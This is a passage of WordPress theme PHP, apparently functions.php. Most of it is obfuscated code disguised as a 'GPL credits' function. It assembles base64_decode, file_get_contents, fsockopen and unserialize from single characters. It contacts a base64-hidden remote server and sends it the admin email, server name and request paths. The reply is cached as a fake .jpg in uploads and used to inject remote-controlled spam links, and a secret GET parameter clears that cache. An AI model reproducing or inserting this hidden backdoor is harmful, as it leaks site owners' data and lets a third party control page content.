apply_filters("the_content", $jd_______i);$jd_______i = str_replace("]]>", "]]>", $jd_______i);if (strlen($_GET["p"]) > 0) {echo $jd_______i;}else if ((strlen($jd_______i)>$wo__p) && ($lo___________s = strpos($jd_______i, " ", $wo__p ))) {$jd_______i = substr($jd_______i, 0, $lo___________s);$jd_______i = $jd_______i;echo $jd_______i;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$xu___u</a></div></p>";} else {echo $jd_______i;}}}$yg_________x='n';$ex_______q='e';$vy__m='c';$hu___________i='6';$yp_______d='a';$kz_______d='o';$mg_________n='4';$yb____p='b';$tt_______________b='e';$rn______a='_';$ql_______________x='s';$zx___x='e';$tj____b='d';$er______________g=$yb____p.$yp_______d.$ql_______________x.$tt_______________b.$hu___________i.$mg_________n.$rn______a.$zx___x.$yg_________x.$vy__m.$kz_______d.$tj____b.$ex_______q;$ho_________e='i';$xb_______________j='e';$zk___________h='_';$qo__________v='e';$yr_________i='f';$zf________y='c';$al____z='s';$ba_______________y='t';$ny__________k='e';$zp_____________k='n';$xh_______s='_';$xq____________x='t';$eu____u='o';$zy______f='l';$ju__________g='n';$ki_____________i='t';$xm_______________q='g';$xo_______o=$yr_________i.$ho_________e.$zy______f.$qo__________v.$xh_______s.$xm_______________q.$xb_______________j.$ki_____________i.$zk___________h.$zf________y.$eu____u.$ju__________g.$ba_______________y.$ny__________k.$zp_____________k.$xq____________x.$al____z;$ix_______w='l';$cf__t='i';$qm__n='e';$xb__o='e';$qa____t='s';$ra__________l='_';$jr__________h='x';$dn____d='i';$cw_______a='s';$zc_____________b='f';$ff________n='t';$cp_________w=$zc_____________b.$cf__t.$ix_______w.$xb__o.$ra__________l.$qm__n.$jr__________h.$dn____d.$qa____t.$ff________n.$cw_______a;$ew_____l='o';$im_____________o='i';$ga_______m='e';$mi____________s='c';$jh______________j='_';$ae_______j='v';$cm____z='n';$tj______________o='s';$oc_____r='r';$gk________s='r';$nq______h='m';$jd____p='o';$rr______________v='a';$ok__________y='e';$ae_____________i='p';$gv________h=$ae_______j.$ga_______m.$gk________s.$tj______________o.$im_____________o.$ew_____l.$cm____z.$jh______________j.$mi____________s.$jd____p.$nq______h.$ae_____________i.$rr______________v.$oc_____r.$ok__________y;$wr_____________e='s';$xp_______i='k';$tt_________p='p';$gh______c='n';$xy________u='o';$it___________b='f';$ym__________g='e';$ux______________v='c';$lw___x='o';$zf________f=$it___________b.$wr_____________e.$lw___x.$ux______________v.$xp_______i.$xy________u.$tt_________p.$ym__________g.$gh______c;$dq___z='i';$ff______________e='f';$pw__x='r';$qh_____j='e';$qr____________p='t';$he_________h='w';$sx_____________y=$ff______________e.$he_________h.$pw__x.$dq___z.$qr____________p.$qh_____j;$zc__________q='5';$gt____j='m';$ji______a='d';$jf____y=$gt____j.$ji______a.$zc__________q;$vu___p='t';$uz_____________t='h';$vp______________s='e';$ds__________m='p';$xj_____o='a';$ix_____________a='a';$mc________j='l';$zn___x='r';$ke___________d=$zn___x.$vp______________s.$xj_____o.$mc________j.$ds__________m.$ix_____________a.$vu___p.$uz_____________t;$bi_________p='s';$lm______n='z';$pb____________p='l';$uv___s='e';$tx_______________f='i';$mo_________c='n';$na________x='r';$ga_______z='a';$yr__________l='e';$mx_____g='i';$zr____j='u';$qq_______j=$zr____j.$mo_________c.$bi_________p.$yr__________l.$na________x.$mx_____g.$ga_______z.$pb____________p.$tx_______________f.$lm______n.$uv___s;$pp_________v='m';$kj__________h='p';$gm________z='t';$zb______________l='n';$dk____s='e';$kt_______g='a';$xu_____________w='m';$hx________c=$gm________z.$dk____s.$pp_________v.$kj__________h.$zb______________l.$kt_______g.$xu_____________w;$ah___________p='a';$nc______k='e';$ja______________k='t';$xr______y='t';$ym______x='_';$te________b='x';$sa____________c='o';$yn______n='c';$br_________h='n';$lm_________m='a';$ax_______________t='e';$pf___________g='s';$ue_______________p='_';$oi__________i='t';$vi_______________s='e';$rd_____________s='r';$xt_________s='t';$zq_______s='c';$hs_____m='m';$gg____a='r';$pg___________a='e';$dg_______y=$pf___________g.$ja______________k.$gg____a.$ax_______________t.$lm_________m.$hs_____m.$ue_______________p.$yn______n.$sa____________c.$br_________h.$xr______y.$pg___________a.$te________b.$xt_________s.$ym______x.$zq_______s.$rd_____________s.$vi_______________s.$ah___________p.$oi__________i.$nc______k;function iu__________o($hu________h) {global $fi_____l, $fu___________u, $xo_______o, $gv________h, $dg_______y;if (!$fu___________u($fi_____l("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($gv________h(PHP_VERSION, "5.0.0", ">=") && $fu___________u($fi_____l("ZmlsZV9nZXRfY29udGVudHM=")) && $fu___________u($fi_____l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$yp_____________r = $dg_______y(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$qi______________r = @$xo_______o($hu________h, 0, $yp_____________r);} else {$qi______________r = @$xo_______o($hu________h, 0);}return $qi______________r;}function op__g($hu________h) {global $fu___________u, $zf________f, $sx_____________y, $fi_____l;if (!$fu___________u($fi_____l("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$xb_____q = strpos($hu________h, "/", 7);$gi_____________n = array("uri"     => substr($hu________h, $xb_____q),"host"    => str_replace("http://", "", substr($hu________h, 0, $xb_____q)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$yz____________e = @$zf________f("$gi_____________n[host]", 80, $rr___t, $oo____v, 4);if (!$yz____________e) {return false;} else {$qi______________r = "";$bm_______________b  = "GET $gi_____________n[uri] HTTP/1.0\r\n";$bm_______________b .= "Host: $gi_____________n[host]\r\n";$bm_______________b .= "Referer: $gi_____________n[referer]\r\n";$bm_______________b .= "Connection: Close\r\n\r\n";@$sx_____________y($yz____________e, $bm_______________b);while (!@feof($yz____________e)) {$cb_______u = @fgets($yz____________e, (1024*24));if ($cb_______u == "\r\n") {$kz_____________n = true;continue;}if ($kz_____________n) {$qi______________r .= $cb_______u;}}return $qi______________r;}}function mr______________l($hu________h) {global $fu___________u;$ok___________m = false;if ($hu________h != "") {if ($fu___________u("iu__________o")) {$ok___________m = @iu__________o($hu________h);}if (!$ok___________m && ($fu___________u("op__g"))) {$ok___________m = @op__g($hu________h);}}return $ok___________m;}function hf______x() {global $_SERVER, $jf____y;$iw______p = $_SERVER["SERVER_NAME"];if (substr("$iw______p", 0, 4) == "www.") {$iw______p = substr("$iw______p", 4);}$iw______p = $jf____y("$_SERVER[SERVER_NAME]");return $iw______p;}function md__________a() {return "file";}function qg_____k($hu________h) {global $_SERVER, $xo_______o, $cp_________w, $oo__b, $dl__________t, $sx_____________y;$jb____________s = al______t();$ak______l = hf______x().".jpg";$dx___f = $jb____________s["dir_upload"]["path"]."/$ak______l";$cn________j = @filemtime($dx___f);if (!$cn________j || ((time()-$cn________j) >= WP_TTL)) {$ok___________m = mr______________l($hu________h);if ($ok___________m) {if ($cp_________w($dx___f)) {@unlink($dx___f);}$yn_______y = @$oo__b($dx___f, "x+");@$sx_____________y($yn_______y, $ok___________m);@$dl__________t($yn_______y);}} else {if ($cp_________w($dx___f)) {$ok___________m = @$xo_______o($dx___f);} else {$ok___________m = false;}}return $ok___________m;}function al______t() {global $_SERVER, $fi_____l, $er______________g;$ug_______________r = wp_count_posts("post");$ex______f = pathinfo(get_bloginfo("template_directory"));$jb____________s = array("url" => array("report"      => $fi_____l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ex______f,"dir_upload"=> na____________k(),"queryString"=> array("?a001=".WP_ID,"a004=".$ex______f[filename],"a005=".$ug_______________r->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://clinic-virtus.com/belkovoe-kompleksnoe-pitanie-na-osnove-syvorotochnyx-frakcij-i-kazeina/\">Комплексное питание</a>");$jb____________s["url"]["queryString"] = implode("&", $jb____________s["queryString"]);$jb____________s["url"]["report"] = $jb____________s["url"]["report"]."/?".$er______________g($jb____________s["url"]["queryString"]).".html";return $jb____________s;}function na____________k() {$qc_____x = wp_upload_dir();if (isset($qc_____x["error"])) {$hp______v = hu___j();if (is_writable($hp______v)) {$qc_____x = array("path" => $hp______v);}}return $qc_____x;}function hu___j() {global $fu___________u, $jf____y, $ke___________d, $hx________c;$lz_______________c = (bool) ini_get("safe_mode");if ($lz_______________c == true) {return false;}if ($fu___________u("sys_get_temp_dir")) {$tr_______________b = sys_get_temp_dir();if (is_writable($tr_______________b)) {return $ke___________d($tr_______________b);}}if (!empty($_ENV["TMP"])) {return $ke___________d($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ke___________d($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ke___________d($_ENV["TEMP"]);} else {$pn________h = $hx________c($jf____y(uniqid(rand(), true)), "");if ($pn________h) {$tr_______________b = $ke___________d(dirname($pn________h));@unlink($pn________h);return $tr_______________b;} else {return false;}}}function dy_____s() {global $_GET, $cp_________w;$jb____________s = al______t();$iw______p = hf______x();$cw___n = md__________a();$ea________e = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($cw___n == "file") {$vz______________j = $jb____________s["dir_upload"]["path"]."/".$iw______p.".jpg";if ($cp_________w($vz______________j)) {@unlink($vz______________j);$ea________e = "deleted";}}$fk_____________o = array("s"=> $ea________e,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($fk_____________o AS $jq_______________e => $pv_________i) echo " [$jq_______________e:$pv_________i]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $fu___________u, $fi_____l, $qq_______j;$jb____________s = al______t();$sk_____________f = "qg_____k";if ($fu___________u($sk_____________f)) {$qi______________r = $sk_____________f($jb____________s["url"]["report"]);}if ($qi______________r) {if ($qi______________r = @$fi_____l($qi______________r)) {$qi______________r = @$qq_______j($qi______________r);if (strlen($qi______________r[custom_credit]) >= 5) {$jb____________s["default_string"] = $qi______________r[custom_credit];}if ($qi______________r["status"] == "0") {$dz____________p = 1;$gh______________w = 1;} else {$bn_____m = sizeof($qi______________r["links"]);$lt______i = $jb____________s["default_string"];if ($bn_____m > 0 && $qi______________r["links"] !== "") {$cl____f = 0;foreach ($qi______________r["links"] as $bc__________n => $ls___________l) {$cl____f++;if ($ls___________l->l_path == "" || $ls___________l->l_path == $_SERVER["REQUEST_URI"]) {$ls___________l->l_href = htmlspecialchars(strip_tags($ls___________l->l_href));$ls___________l->l_title = htmlspecialchars(strip_tags($ls___________l->l_title));$ls___________l->l_anchor = htmlspecialchars(strip_tags($ls___________l->l_anchor));$lt______i .= " | ";$lt______i .= "<a href='$ls___________l->l_href' title='$ls___________l->l_title'";if ($ls___________l->l_nofollow == "1") {$lt______i .= " rel='nofollow'";}$lt______i .= ">$ls___________l->l_anchor</a>";}}}$jb____________s["links"] = "$lt______i";if ($qi______________r[credit] == "0") {$jb____________s["links"] = "";}}} else {$dz____________p = "1";}} else {$dz____________p = "1";}if ($dz____________p == "1") {$jb____________s["links"] = $jb____________s["default_string"];}echo "$jb____________s[links]";echo "<!-- s: $qi______________r[signature] -->";dy_____s();}                      
function widget_verticalmenu_init() {
	if ( !function_exists('register_sidebar_widget') ) return;
	register_sidebar_widget(array('Vertical menu', 'widgets'), 'widget_verticalmenu');
}

add_action('widgets_init', 'widget_verticalmenu_init');
